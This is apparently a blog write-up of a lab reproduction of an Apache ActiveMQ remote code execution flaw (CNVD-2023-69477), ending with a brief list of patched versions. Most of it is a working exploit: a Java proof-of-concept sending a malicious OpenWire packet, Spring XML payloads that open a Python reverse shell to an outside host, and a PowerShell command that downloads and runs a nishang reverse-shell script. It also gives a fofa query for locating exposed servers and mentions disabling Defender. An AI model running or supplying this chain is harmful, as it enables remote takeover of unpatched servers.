Apache ActiveMQ remote code execution vulnerability recurrence (CNVD-2023-69477)

Apache ActiveMQ remote code execution RCE vulnerability recurrence (CNVD-2023-69477)

The vulnerability that was discovered last week is a good time to reproduce it and record it.

1.Vulnerability description

A remote code execution vulnerability exists in Apache ActiveMQ. A remote attacker with access to the Apache ActiveMQ server TCP port (default is 61616) can execute arbitrary code by sending malicious data to the server.

影响版本

Apache ActiveMQ < 5.18.3

Apache ActiveMQ < 5.17.6

Apache ActiveMQ < 5.16.7

Apache ActiveMQ < 5.15.16

fofa syntax:

app="APACHE-ActiveMQ" && port="61616"

2.Environment setup

​ Here I reproduced it locally, using kali and win10

Install ActiveMQ

Visit:https://activemq.apache.org/, download any vulnerable version

What I downloaded here is the apache-activemq-5.15.10 version

Unzip and enter the bin directory

use:

activemq start #启动

Visithttp://127.0.0.1:8161 and you can see that the environment started successfully

3. Vulnerability recurrence

access:https://github.com/sincere9/Apache-ActiveMQ-RCE/tree/main/exp

After downloading, enter the /exp folder, see ActiveMQ.java, and modify your IP address, win10:192.168.2.129 ,kali192.168.2.131

import java.io.*;
import java.net.Socket;

public class ActiveMQ {
    public static void main(final String[] args) throws Exception {
        System.out.println("[*] Poc for ActiveMQ openwire protocol rce");
        String ip = "192.168.2.129";						    
        int port = 61616;
        String pocxml= "http://192.168.2.131:8000/poc.xml";		
        Socket sck = new Socket(ip, port);
        OutputStream os = sck.getOutputStream();
        DataOutputStream out = new DataOutputStream(os);
        out.writeInt(0); //无所谓
        out.writeByte(31); //dataType ExceptionResponseMarshaller
        out.writeInt(1); //CommandId
        out.writeBoolean(true); //ResponseRequired
        out.writeInt(1); //CorrelationId
        out.writeBoolean(true);
        //use true -> red utf-8 string
        out.writeBoolean(true);
        out.writeUTF("org.springframework.context.support.ClassPathXmlApplicationContext");
        //use true -> red utf-8 string
        out.writeBoolean(true);
        out.writeUTF(pocxml);
        //call org.apache.activemq.openwire.v1.BaseDataStreamMarshaller#createThrowable cause rce
        out.close();
        os.close();
        sck.close();
        System.out.println("[*] Target\t" + ip + ":" + port);
        System.out.println("[*] XML address\t" + pocxml);
        System.out.println("[*] Payload send success.");
    }
}

Then modify the xml file:

<beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
 <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
    <constructor-arg>
      <list>
        <value>python</value>
        <value>-c</value>
	<value><![CDATA[import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("niubi.com",9999));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")]]></value>
      </list>
    </constructor-arg>
  </bean>
</beans>

Then start the command

python3 -m http.server 8000		#启动http监听
nc -lvvp 9999					#监听端口
javac ActiveMQ.java				#编译
java ActiveMQ					#运行

However, the poc.xml file is indeed called here but there is no rebound shell.

So try ping dnslog

Modify xml

<beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
 <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
    <constructor-arg>
      <list>
        <value>ping</value>
        <value>t1298j.dnslog.cn</value>
      </list>
    </constructor-arg>
  </bean>
</beans>

Here we see that the DNSlog platform does have an echo, proving that the command was executed.

So I tried to find a way to rebound the shell. I thought that the Windows rebound shell command might be different, so I used powershell to rebound the shell.

Modify the poc.xml file:

<beans xmlns="http://www.springframework.org/schema/beans"
       xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
       xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">

    <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
        <constructor-arg>
            <list>
                <value>powershell</value>
                <value>-c</value>
                <value><![CDATA[IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1'); Invoke-PowerShellTcp -Reverse -IPAddress 192.168.2.131 -Port 23333]]></value>
            </list>
        </constructor-arg>
    </bean>
</beans>

Listen and run exp again

You can see the successful rebound shell

PS: During the shell rebound process, it did not pop up at first, so I entered \apache-activemq-5.15.10\data, checked the activemq.log log information, and found the termination link

So I turned off the win10 firewall, defend, etc., turned on the log log4j.logger.org.apache.activemq=DEBUG, and then checked the logs to solve the problem. Only here did I successfully rebound the shell.

4.Bug fix

Currently, the official has fixed this vulnerability by restricting the deserialization class to only be a subclass of Throwable. It is recommended that affected users update to:
Apache ActiveMQ >= 5.18.3
Apache ActiveMQ >= 5.17.6
Apache ActiveMQ >= 5.16.7
Apache ActiveMQ >= 5.15.16